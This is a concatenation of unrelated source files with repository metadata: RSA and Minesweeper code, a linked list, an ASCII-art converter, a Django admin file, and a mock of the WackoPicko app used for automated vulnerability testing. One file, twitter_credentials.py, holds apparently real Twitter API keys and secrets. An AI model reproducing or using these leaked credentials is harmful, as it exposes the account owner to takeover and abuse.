    print("Using {fsa_name} and {tbl_name} for your tbl2asn submission.".format(
        fsa_name=fsa_name, tbl_name=tbl_name
    ))
    return fsa_name, tbl_name
if __name__ == "__main__":
    # Example run: annotate the assembly for SRA sample 1561998.
    os.chdir("/home/zhaolab1/data/mitosra/dna/wkdir/1561998")
    r_ref = "/home/zhaolab1/data/mitosra/dna/anno/exon/ref/rrna.fasta"
    cds_ref = "/home/zhaolab1/data/mitosra/dna/anno/exon/ref/celmt_p.fasta"
    out = flow_re_order("1561998.fasta")
    flow_tbl(out, cds_ref, r_ref, spe_name="Caenorhabditis tropicalis")
| [
"runsheng.lee@gmail.com"
] | runsheng.lee@gmail.com |
8591255bf99ff7a2d00d56cd1fdc18d76b93e748 | 6004bf293916050951e7706f8c5f51d8c9ba32e0 | /crypto/little_rsa.py | fcdc86763a98829cf06beb1e193de8b2be527ef8 | [] | no_license | fuckualreadytaken/ctf | ecb75ddbd28c9f0cf7ab743c205291cc21d0699b | 76843cdb91f4747ad1b92c30c7c4c1962605aa90 | refs/heads/master | 2021-04-15T19:05:53.325278 | 2018-08-13T14:51:28 | 2018-08-13T14:51:28 | 126,860,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,469 | py | #! /usr/bin/env python
# coding=utf-8
import random
import math
def produce_odd(start, end):
    """Return a random odd integer strictly between *start* and *end*.

    Fix: the original stepped by 2 from start+1, which yields only EVEN
    numbers when *start* is odd; the base is now aligned to the first odd
    value above *start*.  Behaviour is unchanged for even *start* (the way
    the RSA code calls it).
    """
    first = start + 1
    if first % 2 == 0:
        first += 1
    return random.randrange(first, end, 2)
def ModExp(n, k, m):
    """Compute (n ** k) % m with right-to-left binary exponentiation.

    Walks the bits of k from least to most significant, multiplying the
    accumulator by the current square whenever the bit is set.
    """
    result = 1
    square = n
    for bit in bin(k)[2:][::-1]:
        if bit == '1':
            result = (result * square) % m
        square = (square * square) % m
    return result
def euclid(a, b):
    """Return gcd(a, b) via the iterative Euclidean algorithm."""
    while b != 0:
        a, b = b, a % b
    return a
class Euclid:
    """Extended Euclidean algorithm over two integers.

    __init__ runs the plain Euclidean algorithm, recording the dividends
    (c), divisors (p) and quotients (q) of every step; afterwards
    self.num1 holds gcd(num1, num2).  method1() back-substitutes through
    those records (printing each step) and returns the coefficient x such
    that x * num1 is congruent to the gcd modulo num2 — used by
    RSA.generate_key as the modular inverse of e.

    Fixes: print statements converted to the portable call form and `/`
    replaced with `//` so the quotients stay integers on Python 3
    (identical results on Python 2).
    """

    def __init__(self, num1, num2):
        self.num1 = num1
        self.num2 = num2
        self.c = []  # dividend at each division step
        self.p = []  # divisor at each division step
        self.q = []  # integer quotient at each step
        while self.num2 != 0:
            self.c.append(self.num1)
            self.p.append(self.num2)
            x = self.num1 // self.num2
            self.q.append(x)
            r = self.num1 % self.num2
            self.num1 = self.num2
            self.num2 = r
        # the last quotient belongs to the remainder-0 step and is unused
        self.q.pop(-1)

    def method1(self):
        """Back-substitute to the Bezout coefficient of num1; prints each step."""
        print("\t{0:<4}".format(self.num1))
        self.c.reverse()
        self.p.reverse()
        index = 1
        if len(self.c) == 1:
            index = 0
        c_x = 1
        p_x = -(self.c[index] // self.p[index])
        while len(self.c) - 1 >= index:
            print("\t{0:>8}{1}x({2})+{3}x({4})".format("=", self.c[index], c_x, self.p[index], p_x))
            if len(self.c) - 1 == index:
                break
            tmp = c_x
            c_x = p_x
            p_x = tmp - (self.c[index + 1] // self.p[index + 1] * p_x)
            index += 1
        return c_x
class RSA:
    """Toy RSA key generator / cipher (Python 2 code, educational only).

    Primes are drawn from fixed small ranges, tested with trial division
    by small primes plus five Miller-Rabin rounds, and the private
    exponent is obtained from the Euclid class above.  ModExp does the
    modular exponentiation for encrypt/decrypt.
    """
    # trial-division primes for the cheap first screening
    small_primes = [2, 3, 5, 7, 11, 13, 17, 19]
    # scratch counter used by getst1 (shared class state, reset per test)
    count = 0
    version = 1.0
    # fixed public exponent
    e = 17

    def __init__(self):
        self.pk = []  # public key [n, e]
        self.sk = []  # secret key [n, d]

    def small_primes_test(self, num):
        """Return False if num is divisible by any of the small primes."""
        for small_prime in self.small_primes:
            if num % small_prime == 0:
                print "\t\t\033[1;31;0m[-]Small primes test not passed."
                print "\t\t\033[1;31;0m[-]The number %d can be divided by \033[1;37;0m%d" % (num, small_prime)
                return False
        return True

    def getst1(self, n):
        """Split n as 2**s * t with t odd; returns (s, t).

        Relies on self.count being zeroed by the caller; uses Python 2
        integer division semantics of `/`.
        """
        if n % 2 == 0:
            self.count += 1
            return self.getst1(n / 2)
        else:
            return self.count, n

    def generate_b(self, b, n):
        """Redraw b until gcd(b, n) == 1 (a valid Miller-Rabin witness base)."""
        if euclid(b, n) > 1:
            b = random.randint(2, n - 2)
            return self.generate_b(b, n)
        else:
            return b

    def miller_rabin_test(self, n):
        """Five rounds of Miller-Rabin; False means definitely composite."""
        index = 1
        self.count = 0
        # n - 1 == 2**s * t with t odd
        s, t = self.getst1(n - 1)
        while index <= 5:
            b = self.generate_b(random.randint(2, n - 2), n)
            print "\t\t\t{0}'s test, b is {1}".format(index, b)
            j = 0
            try:
                # math.pow overflows to OverflowError for big exponents
                r = math.pow(b, t) % n
            except OverflowError:
                print "\t\t\tThe number is too big.But we can use another method!"
                r = ModExp(b, t, n)
            if r == 1 or r == n - 1:
                pass
            else:
                # square repeatedly, looking for n - 1 among the powers
                while j < s:
                    j += 1
                    r = (r * r) % n
                    if r == n - 1:
                        break
                if s == j:
                    return False
            index += 1
        print "\t\t[+]Miller rabin test passed!The fake's passing rate is {0}".format(1 / float(math.pow(4, 5)))
        return True

    def primes_test(self, num):
        """Combined screen: small primes, then Miller-Rabin for num > 361."""
        print "\t\t[*]Primes test begin."
        if self.small_primes_test(num):
            print "\t\t[+]Small primes test passed."
        else:
            return False
        if num > 361:
            print "\t\t[*]Miller rabin test begin."
            if self.miller_rabin_test(num):
                return True
            else:
                return False
        return True

    def produce_prime1(self, num, start, end):
        """Probe odd numbers from num upward (wrapping at end) until one passes."""
        print "\t[+]The number of test is %d" % num
        if self.primes_test(num):
            return num
        else:
            num += 2
            if num > end:
                # wrap back into [start, end)
                num = end - num + start
            return self.produce_prime1(num, start, end)

    def produce_prime(self, start, end):
        """Draw a random odd starting point and search for a prime from it."""
        p = produce_odd(start, end)
        return self.produce_prime1(p, start, end)

    def generate_key(self):
        """Generate pk = [n, e] and sk = [n, d]; retries if e divides phi(n)."""
        print "[*]First prime is producing" + "." * 100
        p1 = self.produce_prime(2 ** 6, 2 ** 7)
        print "\t[*]The first prime is %d" % p1
        print "[*]Second prime is producing" + "." * 100
        p2 = self.produce_prime(2 ** 14, 2 ** 15)
        print "\t[*]The second prime is %d" % p2
        n = p1 * p2
        yn = (p1 - 1) * (p2 - 1)
        if yn % self.e == 0:
            # e must be invertible mod phi(n); start over otherwise
            print "\033[1;31;0m[-]Error! Bat n!"
            self.generate_key()
            return
        print "[*]d is producing" + "." * 100
        # d is the modular inverse of e, via the extended Euclid class
        E = Euclid(self.e, yn)
        d = E.method1()
        if d < 0:
            d = d + yn
        print "[*]d is: %d" % d
        self.pk = [n, self.e]
        print "[*]pk is:",
        print self.pk
        self.sk = [n, d]
        print "[*]sk is:",
        print self.sk

    def encrypt(self, m):
        """c = m**e mod n."""
        return ModExp(m, self.pk[1], self.pk[0])

    def decrypt(self, c):
        """m = c**d mod n."""
        return ModExp(c, self.sk[1], self.sk[0])
if __name__ == "__main__":
    # Brute-force discrete-log search: find x in [1e8, 2e8) with
    # 12**x % m == y.  Prints every matching exponent.
    k = 12
    m = 2103157897831904071864395721267
    y = 446615800949186291810252513371
    for i in range(100000000, 200000000):
        if y == ModExp(k, i, m):
            print "x is :" + str(i)
| [
"365078225@qq.com"
] | 365078225@qq.com |
5ada8331b1e26070ab3d970c083a01aa1ae12d41 | 0f3940f9d8315aa732fc1561b62846daad875ede | /home/admin.py | 0253c0c742fd89ecc52146c27b5d191f6b292b3f | [] | no_license | gokhalevedant06/MoneyManager | 922722aa998ac8370b25f9e99a7fede9306a7a97 | 2b0c8419732582ce4341e6f5a2d0b7b145ffb6ec | refs/heads/master | 2023-07-11T03:02:35.848301 | 2021-08-04T13:41:39 | 2021-08-04T13:41:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from django.contrib import admin
from .models import *
# Register your models here.
@admin.register(Choice)
class ChoiceAdmin(admin.ModelAdmin):
    """Admin configuration for the Choice model."""
    # columns shown in the changelist view
    list_display = [
        'field',
        'value'
    ]
    # 'value' is the clickable link to the edit page
    list_display_links = [
        'value'
    ]

# UserInfo uses the default ModelAdmin
admin.site.register(UserInfo)
| [
"mitrajeetgolsangi@gmail.com"
] | mitrajeetgolsangi@gmail.com |
47261b4e4d07ae44fd014d90a146656008612d6a | 775ecc1b24e6039199d4a1ea83088f81f36da3b7 | /lbs5.py | 2377fa53fa53de37990c8468c73a27c35bda1b98 | [] | no_license | arjunreddy8296217721/02royalmechd12018 | 7fd387524c9c8fd22255853d2cb87d57ade1801a | 5e928c90e06eff4a79cc81914e77c21a2f3fd94b | refs/heads/master | 2020-03-27T21:55:53.378310 | 2018-11-16T06:46:47 | 2018-11-16T06:46:47 | 147,187,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66 | py | a=1
# Count up from 1 to 5 (a starts at 1 above), then back down from 5 to 1.
while a <= 5:
    print(a)
    a += 1
a = 5
while a >= 1:
    print(a)
    a -= 1
| [
"noreply@github.com"
] | noreply@github.com |
1a73540dab8856cd097f7a39a0b4a2a1fb617497 | 2ab6a480af8d6111fc01ffd4f76f72f4dbfa4f72 | /AI_hw2/AI_hw/gernerator.py | 1c8394bde0daee765d6269dac6466dd8194f1518 | [] | no_license | KaivinC/AI_hw2 | f6ed857bb06e442990b20c94cfd00243bbe98715 | e06a7c85e3ca82c291bef3b2c16c4a57be63e91a | refs/heads/master | 2022-04-26T20:24:14.697723 | 2020-05-01T12:42:31 | 2020-05-01T12:42:31 | 260,440,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,011 | py | import random
import time
# Offsets of the 8 cells surrounding a grid position (row, col deltas).
neighbor = [(-1, -1), (-1, 0), (-1, 1), (0, -1),
            (0, 1), (1, -1), (1, 0), (1, 1)]
def Neighbor(BoardSize, x, y):
    """Return the in-bounds neighbor coordinates of (x, y).

    BoardSize is (rows, cols).  The result preserves the original
    scan order: row offset -1, 0, 1, then column offset -1, 0, 1,
    skipping the cell itself.

    Improvement: the offsets are generated locally instead of reading the
    module-level `neighbor` global, making the helper self-contained.
    """
    offsets = [(dx, dy) for dx in (-1, 0, 1) for dy in (-1, 0, 1)
               if (dx, dy) != (0, 0)]
    result = []
    for dx, dy in offsets:
        nx, ny = x + dx, y + dy
        if 0 <= nx < BoardSize[0] and 0 <= ny < BoardSize[1]:
            result.append((nx, ny))
    return result
def make_question(BoardSize, num_mines, num_Hint):
    """Generate a Minesweeper puzzle.

    Places num_mines 'X' cells at random, guarantees every mine has at
    least one revealed neighbor, reveals isolated cells, spends any
    remaining hints at random, then converts hints to adjacent-mine
    counts.  Returns (Q, ans): Q shows the hint numbers with -1 for
    unrevealed cells; ans is the full solution grid.
    """
    ans = [[None for j in range(BoardSize[1])] for i in range(BoardSize[0])]
    # drop the mines on distinct random cells
    for _ in range(num_mines):
        i = random.randint(0, BoardSize[0]-1)
        j = random.randint(0, BoardSize[1]-1)
        while ans[i][j] is not None:
            i = random.randint(0, BoardSize[0]-1)
            j = random.randint(0, BoardSize[1]-1)
        ans[i][j] = 'X'
        # ensure the fresh mine touches at least one hint cell
        N = Neighbor(BoardSize, i, j)
        random.shuffle(N)
        for (Nx, Ny) in N:
            if ans[Nx][Ny] is None:
                ans[Nx][Ny] = 'Hint'
                num_Hint -= 1
                break
            if ans[Nx][Ny] == 'Hint':
                break
    # cells with no marked neighbor at all become hints themselves
    for i in range(BoardSize[0]):
        for j in range(BoardSize[1]):
            if ans[i][j] is None:
                BREAK = False
                for (Nx, Ny) in Neighbor(BoardSize, i, j):
                    if ans[Nx][Ny] is not None:
                        BREAK = True
                        break
                if BREAK:
                    continue
                ans[i][j] = 'Hint'
                num_Hint -= 1
    # spend any remaining hint budget on random empty cells
    for _ in range(num_Hint):
        i = random.randint(0, BoardSize[0]-1)
        j = random.randint(0, BoardSize[1]-1)
        while ans[i][j] is not None:
            i = random.randint(0, BoardSize[0]-1)
            j = random.randint(0, BoardSize[1]-1)
        ans[i][j] = 'Hint'
    # turn every hint into its adjacent-mine count
    for i in range(BoardSize[0]):
        for j in range(BoardSize[1]):
            if ans[i][j] == 'Hint':
                ans[i][j] = 0
                for (Nx, Ny) in Neighbor(BoardSize, i, j):
                    if ans[Nx][Ny] == 'X':
                        ans[i][j] += 1
    # question grid: numbers where revealed, -1 everywhere else
    Q = [[None for j in range(BoardSize[1])] for i in range(BoardSize[0])]
    for i in range(BoardSize[0]):
        for j in range(BoardSize[1]):
            if type(ans[i][j]) == int:
                Q[i][j] = ans[i][j]
            else:
                Q[i][j] = -1
    return Q, ans
def check(BoardSize, num_mines, MAP):
    """Validate a solved board.

    True iff MAP contains exactly num_mines 'X' cells and every integer
    cell equals the number of adjacent mines.
    """
    mines_seen = 0
    for i in range(BoardSize[0]):
        for j in range(BoardSize[1]):
            cell = MAP[i][j]
            if cell == 'X':
                mines_seen += 1
            # exact type check on purpose: only revealed number cells count
            if type(cell) == int:
                adjacent = 0
                for (nx, ny) in Neighbor(BoardSize, i, j):
                    if MAP[nx][ny] == 'X':
                        adjacent += 1
                if adjacent != cell:
                    return False
    return mines_seen == num_mines
"noreply@github.com"
] | noreply@github.com |
df6bb199aa33221b02a071eebb1a06018e2600d3 | e35fd52fe4367320024a26f2ee357755b5d5f4bd | /Chapter 3 - Stacks and Queues/linkedlist.py | b949d5439e2e9c0378f1d78a0e7ded42d00de4ba | [] | no_license | liseyko/CtCI | a451967b0a0ce108c491d30b81e88d20ad84d2cd | c27f19fac14b4acef8c631ad5569e1a5c29e9e1f | refs/heads/master | 2020-03-21T14:28:47.621481 | 2019-11-12T22:59:07 | 2019-11-12T22:59:07 | 138,658,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,690 | py | from random import randint
class Node():
    """A single element of a singly linked list.

    Holds a payload in *data* and a reference to the following node in
    *next* (None marks the end of the list).
    """
    def __init__(self, data=None, next=None):
        self.data = data
        self.next = next

    def __str__(self):
        return str(self.data)
class LinkedList():
    """Singly linked list of Node objects (head insertion is O(1)).

    Fixes over the original: append() now updates self.len on the first
    element; deleteNode() can delete the head node; all delete paths keep
    self.len in sync; the mutable default argument of __init__ is gone.
    """

    def __init__(self, lst=None):
        """Build a list whose node order matches *lst* (default: empty)."""
        self.head = None
        self.len = 0
        for n in reversed(lst if lst is not None else []):
            self.insert(n)

    def insert(self, data):
        """Prepend *data* to the list."""
        self.head = Node(data, self.head)
        self.len += 1

    def populate(self, q=10, rng=16):
        """Insert random integers in [0, rng] until the list holds q nodes."""
        while self.len < q:
            self.insert(randint(0, rng))

    def append(self, data):
        """Add *data* at the tail (O(n))."""
        if self.head is None:
            self.head = Node(data)
            self.len += 1  # bug fix: length was not updated on the first append
            return
        end = Node(data)
        n = self.head
        while n.next is not None:
            n = n.next
        n.next = end
        self.len += 1

    def deleteNode(self, n):
        """Unlink the node object *n*; return True if it was found.

        Bug fix: the original scan started at head.next and could never
        delete the head node; it also left self.len stale.
        """
        if self.head is None:
            return False
        if self.head is n:
            self.head = self.head.next
            self.len -= 1
            return True
        cn = self.head
        while cn.next:
            if cn.next is n:
                cn.next = cn.next.next
                self.len -= 1
                return True
            cn = cn.next
        return False

    def deleteNode_fast(self, n):
        """O(1) delete: copy the successor's data into *n*, unlink the successor."""
        if not n:
            return False
        if not n.next:
            # no successor: fall back to the O(n) scan
            return self.deleteNode(n)
        n.data = n.next.data
        n.next = n.next.next
        self.len -= 1  # bug fix: keep the length in sync
        return True

    def mkunique(self):
        """Remove duplicate values, keeping the first occurrence of each."""
        buffer = set()
        n = self.head
        if n:
            buffer.add(n.data)
        else:
            return
        while n.next:
            if n.next.data not in buffer:
                buffer.add(n.next.data)
                n = n.next
            else:
                n.next = n.next.next
                self.len -= 1

    def print_data(self):
        """Print all node values comma-separated, then the terminating None."""
        n = self.head
        while n:
            print(n.data, end=', ')
            n = n.next
        print(n)
        if not self.head:
            print("The list is empty.")

    def __str__(self):
        values = []
        n = self.head
        while n:
            values.append(n.data)
            n = n.next
        return str(values)

    def __iter__(self):
        cur_node = self.head
        while cur_node:
            yield cur_node
            cur_node = cur_node.next

    def __len__(self):
        return self.len

    def deleteNodeByData(self, data):
        """Delete the first node containing *data* from the list."""
        if self.head is None:
            return
        if self.head.data == data:
            self.head = self.head.next
            self.len -= 1  # bug fix: keep the length in sync
            return
        n = self.head
        while n.next is not None:
            if n.next.data == data:
                n.next = n.next.next
                self.len -= 1  # bug fix: keep the length in sync
                return self
            n = n.next
        return
| [
"liseyko@gmail.com"
] | liseyko@gmail.com |
3826faedb660a17079a1d293a80165218ad8d2a1 | f8457d2ef0c0c84591e95d42fc3ab942d238cfed | /twitter_credentials.py | 8b554f293ae68b08a44bfe19bcdd1ff7bad47c60 | [] | no_license | Datalker/Tweet2SQLite | 9f3bad0ca996252d48cd77fa086d52236d5fb0ac | cc5105144486c3555b350ee311412dbbab31342d | refs/heads/master | 2021-01-10T18:01:33.752398 | 2016-03-19T19:45:22 | 2016-03-19T19:45:22 | 54,283,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | consumer_key = 'ZVuGbFzFcgktLeXbaQmlDTO0j'
consumer_secret = 'CONT2Mai0DuBfrOSVHVriYxKkODyX7eVxeV6w60LHFKJSERwU2'
access_token = '4865838237-hAp9s69ti8pmLCA0K2WU5lOgzrt0lWP4Q0nhiav'
access_token_secret = 'HP1xwOePTTDqd4Rrcg0VZSgusudt7YNYJAIhmVVFxTuKX'
| [
"e.arnautov@gmail.com"
] | e.arnautov@gmail.com |
62047532182c60dbc9e4704fc63c57e2cbd5d85b | 7106efbc2e61d82454a6418a40a3c3eb548008f5 | /ascii.py | d74ac79ec1057002773364d31811082caf61c173 | [] | no_license | JunchengL/Picture-to-character-painting_Python | a8251d8ac92c01696887f27709f22a01367d12e7 | c6840734f656377139288efd86f93f520263204e | refs/heads/master | 2020-05-16T14:05:54.959080 | 2019-04-23T21:13:25 | 2019-04-23T21:13:25 | 183,092,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,294 | py | # -*- coding: utf-8 -*-
from PIL import Image
import argparse
# First, build a command line input handler the ArgumentParser instance.
# Usage: ascii.py FILE [-o OUTPUT] [--width N] [--height N]
parser = argparse.ArgumentParser()
# Define the width and height of the input file, output file, and output character
parser.add_argument('file') #Input File
parser.add_argument('-o', '--output') #Output File
parser.add_argument('--width', type = int, default = 80) #Output character width
parser.add_argument('--height', type = int, default = 80) #Output character height
# Parse and get parameters
args = parser.parse_args()
# Input image file path
IMG = args.file
# Output character width
WIDTH = args.width
# Output character height
HEIGHT = args.height
# Output path (None when -o is not given; a default file is used below)
OUTPUT = args.output
ascii_char = list("$@B%8&WM#*oahkbdpqwmZO0QLCJUYXzcvunxrjft/\|()1{}[]?-_+~<>i!lI;:,\"^`'. ")
def get_char(r, g, b, alpha=256):
    """Map one RGBA pixel to a glyph from ``ascii_char``.

    Darker pixels map to denser glyphs (the character set is ordered from
    dense to sparse); fully transparent pixels render as a blank space.
    """
    if alpha == 0:
        # Transparent pixel: nothing to draw.
        return ' '
    # Luma-style weighting of the RGB channels, yielding a 0-255 gray value.
    luminance = int(0.2126 * r + 0.7152 * g + 0.0722 * b)
    # Width of the gray interval assigned to each character.
    step = (256.0 + 1) / len(ascii_char)
    return ascii_char[int(luminance / step)]
if __name__ == '__main__':
    # Convert IMG to a WIDTH x HEIGHT character grid and emit it.
    # Open and adjust the width and height of the image
    im = Image.open(IMG)
    im = im.resize((WIDTH,HEIGHT), Image.NEAREST)
    # Initialize the output string
    txt = ""
    # Traverse each line in the picture
    for i in range(HEIGHT):
        # Traversing each column in the row
        for j in range(WIDTH):
            # Convert RGB pixels of (j,i) coordinates to characters and add them to txt string
            # NOTE(review): getpixel returns a 3-tuple for RGB images and a
            # 4-tuple (with alpha) for RGBA; get_char handles both — but
            # palette/gray modes would not unpack correctly. TODO confirm inputs.
            txt += get_char(*im.getpixel((j,i)))
        # Need to add a newline after traversing a line
        txt += '\n'
    # Print to screen
    print(txt)
    # Output to file
    if OUTPUT:
        with open(OUTPUT,'w') as f:
            f.write(txt)
    else:
        with open("output.txt",'w') as f:
            f.write(txt)
| [
"juncheng.liu@outlook.com"
] | juncheng.liu@outlook.com |
e043899f8799a5dd3ba3ad36a0203ce5913e99fa | 38e5f0a750b36ea9c945ddc6b36cc9571d3016c5 | /DS.py | 611359ab73a154a69e9bc2d710782bf413465194 | [] | no_license | TahirT/DS_1920_Gr25 | 5ad5221724c587ea182e860212d883f8d3a3d49b | e817f5c81e4f75c2fe4d09c5b8c581871a76b095 | refs/heads/master | 2021-03-04T05:24:14.351244 | 2020-06-07T00:25:23 | 2020-06-07T00:25:23 | 246,010,312 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 949 | py | import Four_square_cipher
import Vigenere
import sys
import Case
import Create_user
import Export_Key
def Provo():
    """Ask whether to run again; re-enter the dispatcher on "PO" (yes)."""
    answer = input("Deshiron te provoshe perser(PO/JO):")
    if answer.upper() != "PO":
        print("----Procesi perfundoi-----")
    else:
        main()
def main():
    """Prompt for a module name and dispatch to that module's ``main()``.

    Unknown input recurses back into this prompt; recognized modules run
    and then offer a retry via ``Provo()``.
    """
    print("Sheno cilin fajll do te ekzekutosh: ")
    # Fix: use a local variable instead of clobbering sys.argv, which holds
    # the real command-line arguments and should never be reassigned to a
    # plain string.  The value is upper-cased once, so the redundant
    # .upper() calls of the original branches are no longer needed.
    choice = input("vendos emrin e fajllit:").upper()
    if choice == "VIGENERE":
        Vigenere.main()
        Provo()
    elif choice == "FOUR_SQUARE_CIPHER":
        Four_square_cipher.main()
        Provo()
    elif choice == "CREATE_USER":
        Create_user.main()
        Provo()
    elif choice == "EXPORT_KEY":
        Export_Key.main()
        Provo()
    elif choice == "CASE":
        Case.main()
        Provo()
    else:
        print("Vendos vlera valide ")
        main()
if __name__ == "__main__":
    # Run the dispatcher only when executed as a script, not on import.
    main()
| [
"noreply@github.com"
] | noreply@github.com |
263b2d55833a4529dbba4267d5bc84ae71a6716b | 4ffe8c7c314db4a063ef9725264700389155ad08 | /learn_seaborn.py | c1da3ca05377d5bf8739fda3909cd1f9d7c62a4f | [] | no_license | gudengxia/TestOfPQFizz | f3f2ac1bbae75743af891a8a7282e9516529c52d | cb7f60ebf9a62bcfed72b7a5ae37fba71490fec5 | refs/heads/master | 2023-01-14T13:22:52.758299 | 2020-11-16T03:47:11 | 2020-11-16T03:47:11 | 297,596,208 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 479 | py | import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
#sns.set()
#plt.figure()
#sb.set_style('white')
#sb.barplot(x=x,y=y,data=dataset)
#plt.savefig('test.png')
#df = pd.read_csv('akcn.csv')
# Load the benchmark results from the working directory.
df = pd.read_csv('output.csv')
#df = pd.concat([df1, df2], ignore_index=True)
#print(df)
# NOTE(review): xx is built but unused by the active plotting call below.
xx = [i for i in range(21)]
#g = sns.relplot(x=xx, y='mean', kind='line', data=df[3,7])
#g.fig.autofmt_xdate()
# Plot both mean series against their row index.
# Assumes output.csv has 'mean-1' and 'mean-2' columns — TODO confirm.
ax = sns.lineplot(data=[df['mean-1'], df['mean-2']])
plt.show()
| [
"gudengxia@foxmail.com"
] | gudengxia@foxmail.com |
cfc1266530244f99a0aa98f70cd55a93e6f8f402 | c3f4aecdd52fa918e40262f20dc97dbe061039ab | /chapter02/hello_world_003.py | 08b99cb179a7e11f38417f6baaff87460a4dc3e5 | [] | no_license | arisskz6/learnPython | 247452d4367d7e07e3d23bd2c7bd50e599e11870 | 017121e8c0e91c4598427a24612f639f7e3ed3c8 | refs/heads/master | 2023-02-12T21:47:47.426296 | 2021-01-14T08:28:36 | 2021-01-14T08:28:36 | 318,468,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | #!/usr/bin/env python3
# Store the greeting in a variable, then print it (fixes the misspelled
# variable name "mesage" -> "message").
message = "Hello Python Crash Course reader!"
print(message)
| [
"arisstz6@gmail.com"
] | arisstz6@gmail.com |
52e1e482c2162cf3c59307ede3a5faa860f7d0fe | 69c92d6528468365c8130257146dda0448992b34 | /shortener/models.py | a617d60bd88120e03a1c7881a9999e6ef2db0a07 | [] | no_license | bhNibir/urlShortener | 5287a75ea055be82711402c345a632d113c69ab3 | 3c8139b3c702ee8ec3516d2f73b8b0bd606626d7 | refs/heads/master | 2020-05-18T00:43:27.717768 | 2019-04-29T12:57:19 | 2019-04-29T12:57:19 | 184,070,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 270 | py | from django.db import models
# Create your models here.
class ShortenUrl(models.Model):
    """Mapping from a short code (primary key) to the original URL."""
    # The full destination URL being shortened.
    url = models.URLField()
    # The generated short code; doubles as the primary key.
    short_url = models.CharField(max_length=255, primary_key=True)
    # When the mapping was created (set by the caller, not auto_now_add).
    add_date = models.DateTimeField()
    def __str__(self):
        return self.url
| [
"biplob.asanibir@gmail.com"
] | biplob.asanibir@gmail.com |
01ef0c75377ed76b68f6d5dd96805ee796ebea24 | 6c0167de6f58f6f281bbe866c02b74d253e72da7 | /genetic-testing/wackopicko/sqli_reflected/wpmock.py | 9f3ece82cda86eb971b8dff85484bf632ebebcce | [] | no_license | S0U1SB4N3/beagle | ed6111873ec25d44d24941a0b65bb6200607e361 | 7f52475ff66509ea2f6b984c3c755cd72713734f | refs/heads/master | 2021-09-28T02:42:35.322134 | 2018-11-13T14:03:08 | 2018-11-13T14:03:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,737 | py | import re
class WackoPickoXssReflected:
    """Mock of the WackoPicko web app for driving a vulnerability tester.

    Simulates page navigation and form interaction via (x, y) click
    coordinates and typed text, without a real browser.  The listing below
    records per-page "base" scores used by ``best_base``:

    /**/*.php 3
    /index.php 2
    /users/login.php 1
    """
    # Path of the page currently displayed.
    current_page = "/index.php"
    focus = "" # Focused element
    # Captured attack payload, set once the login username field is submitted.
    payload = ""
    # Best (lowest) page score reached so far; starts above any real score.
    base = 10
    # Useful fields
    fields = {
        "search": "",
        "picname": "",
        "username": "",
    }
    _get = {
        "search": "",
        "picname": "",
        "username": "",
    }
    def best_base(self, page):
        # Lower the running score according to the page being entered:
        # the login page scores 1, every other page caps the score at 2.
        if page == "/users/login.php":
            self.base = 1
        elif page == "/index.php":
            if self.base > 1:
                self.base = 2
        else:
            if self.base > 1:
                self.base = 2
    def switch_page(self, page):
        # Keep the submitted form values as the "GET parameters" of the
        # navigation, then reset the live form fields for the new page.
        self._get = self.fields
        self.fields = {
            "search": "",
            "picname": "",
            "username": "",
        }
        self.best_base(page)
        self.current_page = page
    def perform(self, action):
        # Dispatch one (kind, args) action tuple: ("click", (x, y)) or
        # ("type", text).  Unknown kinds are ignored.
        cat = action[0]
        if cat == "click":
            self.click(action[1][0], action[1][1])
        elif cat == "type":
            self.type(action[1])
        else:
            pass
    def click(self, x, y):
        # A click always clears the focus; it may then re-focus an element
        # or navigate, depending on the coordinates.
        self.focus = ""
        # Click on WackoPicko.com
        if (y < 40):
            self.switch_page("/index.php")
        # Click on Header (any page)
        elif (40 <= y < 90):
            # Click on home
            if (0 <= x < 50):
                self.switch_page("/users/home.php")
            elif (50 <= x < 100):
                self.switch_page("/pictures/upload.php")
            elif (100 <= x < 150):
                self.switch_page("/pictures/recent.php")
            elif (150 <= x < 190):
                self.switch_page("/guestbook.php")
            elif (190 <= x < 260):
                self.switch_page("/users/login.php")
            else:
                pass
        # NOTE(review): because the header branch above already consumes
        # y < 90, this branch effectively covers 90 <= y < 120.
        elif (80 <= y < 120):
            if (0 <= x < 150):
                pass
            elif (150 <= x < 200):
                self.focus = "searchfield"
            # Click on submit
            elif (200 <= x < 250):
                if self.fields['search'] != "":
                    self.switch_page("/pictures/search.php")
                    self.fields['search'] = self._get['search']
        # Login-page form: focus the username box or, on submit, capture
        # the typed username as the payload (first submission only).
        if self.current_page == "/users/login.php":
            if (150 <= y < 200):
                if (30 <= x < 180):
                    self.focus = "username"
            elif (200 <= y < 250):
                if (30 <= x < 180):
                    if self.payload == "":
                        self.payload = self.fields['username']
        """
        if self.current_page == "/index.php":
            # Click on Page Content
            if (150 <= y < 151):
                if (0 <= x < 150):
                    self.switch_page("/users/register.php")
            elif (151 <= y < 152):
                if (0 <= x < 150):
                    self.switch_page("/users/sample.php")
            elif (152 <= y < 153):
                if (0 <= x < 150):
                    self.switch_page("/calendar.php")
            elif (153 <= y < 154):
                if (0 <= x < 50):
                    self.switch_page("/error.php")
            # Click on filename field
            elif (154 <= y < 200):
                if (50 <= x < 100):
                    self.focus = "filefield"
            # Click on submit button
            elif (200 <= y < 250):
                if (50 <= x < 100):
                    if self.fields['picname'] != "":
                        self.switch_page("/piccheck.php")
        """
    def type(self, string):
        # Typing only has an effect while the username box is focused.
        if self.focus == "username":
            self.fields['username'] = string
| [
"info@none.org"
] | info@none.org |
